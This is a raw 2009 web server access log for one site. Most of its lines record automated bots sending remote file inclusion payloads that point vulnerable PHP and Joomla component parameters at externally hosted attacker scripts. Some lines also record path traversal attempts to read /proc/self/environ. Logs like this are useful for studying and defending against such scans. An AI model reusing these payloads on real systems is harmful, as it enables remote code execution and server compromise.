150.214.108.8 - - [28/Jun/2009:17:42:35 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:17:45:12 -0700] "GET /?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:17:45:12 -0700] "GET /logs/access_090209.log%20%20//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:17:45:12 -0700] "GET /logs//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 5805 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:17:45:13 -0700] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:17:45:24 -0700] "GET /logs/access_090406.log/db.php?path_local=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:17:45:24 -0700] "GET /logs/db.php?path_local=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
64.34.162.200 - - [28/Jun/2009:17:45:24 -0700] "GET /db.php?path_local=http://rox-crime2.no-ip.org:8080/idv6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:46:23 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
61.67.196.130 - - [28/Jun/2009:17:46:36 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
61.67.196.130 - - [28/Jun/2009:17:46:36 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
61.67.196.130 - - [28/Jun/2009:17:47:03 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
61.67.196.130 - - [28/Jun/2009:17:47:03 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /logs/access_090119.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:47:10 -0700] "GET /logs/access_090413.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:17:48:01 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:17:48:01 -0700] "GET /logs/access_090119.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:17:48:01 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.251.168.157 - - [28/Jun/2009:17:49:12 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.251.168.157 - - [28/Jun/2009:17:49:12 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.251.168.157 - - [28/Jun/2009:17:49:12 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.251.168.157 - - [28/Jun/2009:17:49:13 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.251.168.157 - - [28/Jun/2009:17:49:22 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.251.168.157 - - [28/Jun/2009:17:49:22 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:17:49:34 -0700] "GET /logs/access_090413.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
208.96.54.76 - - [28/Jun/2009:17:49:41 -0700] "GET /logs/access_080512.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.summitcircle.com"
208.96.54.76 - - [28/Jun/2009:17:50:36 -0700] "GET /logs/access_080901.log HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.summitcircle.com"
80.247.76.181 - - [28/Jun/2009:17:51:21 -0700] "GET /logs//index2.php?pagina=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.247.76.181 - - [28/Jun/2009:17:51:22 -0700] "GET /index2.php?pagina=http://www.sancalogero.net/portal/upload/drivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
218.30.100.97 - - [28/Jun/2009:17:51:22 -0700] "GET /logs/access_081201.log//bemarket/postscript/postscript.php?p_mode=http://munbaekcho.es.kr/gallery/language/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:53:53 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:17:53:53 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:17:54:56 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:17:55:06 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:56:11 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:56:11 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:56:11 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:17:56:59 -0700] "GET /logs/access_090119.log//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:57:36 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:57:36 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:17:57:43 -0700] "GET /logs/access_090406.log//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:17:57:45 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:17:57:57 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /logs/access_090413.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:17:58:23 -0700] "GET /logs/access_090119.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:58:50 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:58:55 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:59:02 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:59:02 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:59:16 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:17:59:16 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:17:59:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:17:59:23 -0700] "GET /logs/access_090119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.244.235.254 - - [28/Jun/2009:17:59:24 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:18:01:12 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:18:01:12 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:18:01:30 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:18:01:30 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:18:01:30 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:18:03:23 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:18:03:23 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:18:03:46 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.106.179.130 - - [28/Jun/2009:18:03:46 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:18:09:02 -0700] "GET /logs/access_090413.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:18:09:02 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.165.34.49 - - [28/Jun/2009:18:09:02 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.55.106.242 - - [28/Jun/2009:18:09:33 -0700] "GET /logs/access.log HTTP/1.1" 200 39894 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:09:43 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:18:13:36 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:18:13:45 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:18:16:46 -0700] "GET /error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
150.214.108.8 - - [28/Jun/2009:18:17:03 -0700] "GET /logs//error.php?dir=http://365ftf.com/cmsid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
69.142.154.47 - - [28/Jun/2009:18:17:53 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1306.3130-big; Windows 6.0; MSIE 7.0.6001.18000)" "www.summitcircle.com"
69.142.154.47 - - [28/Jun/2009:18:17:53 -0700] "GET /favicon.gif HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1306.3130-big; Windows 6.0; MSIE 7.0.6001.18000)" "www.summitcircle.com"
65.55.208.20 - - [28/Jun/2009:18:19:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.20 - - [28/Jun/2009:18:19:53 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:18:22:59 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:18:22:59 -0700] "GET /logs/access_090119.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:18:22:59 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
222.122.6.62 - - [28/Jun/2009:18:23:12 -0700] "GET /logs/access_090413.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs/access.log//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs//?sourcedir=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 200 5805 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs/access.log/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 779 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5805 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:18 -0700] "GET /logs/access.log//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:19 -0700] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:18:26:19 -0700] "GET /logs//?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5805 "-" "XXXXXX" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:18:31:02 -0700] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:18:31:02 -0700] "GET /logs/access_090119.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:18:31:02 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
216.45.56.47 - - [28/Jun/2009:18:31:36 -0700] "GET /logs/access_090413.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.summitcircle.com"
66.46.177.182 - - [28/Jun/2009:18:33:27 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.46.177.182 - - [28/Jun/2009:18:33:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.unreals.co.cc/v7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:41:14 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:41:15 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:41:15 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:41:30 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:41:30 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:41:31 -0700] "GET /logs/access_081201.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:18:41:37 -0700] "GET /logs/access_090105.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:18:41:39 -0700] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
221.195.40.213 - - [28/Jun/2009:18:41:41 -0700] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:42:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:42:42 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:42:42 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
216.17.99.13 - - [28/Jun/2009:18:44:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
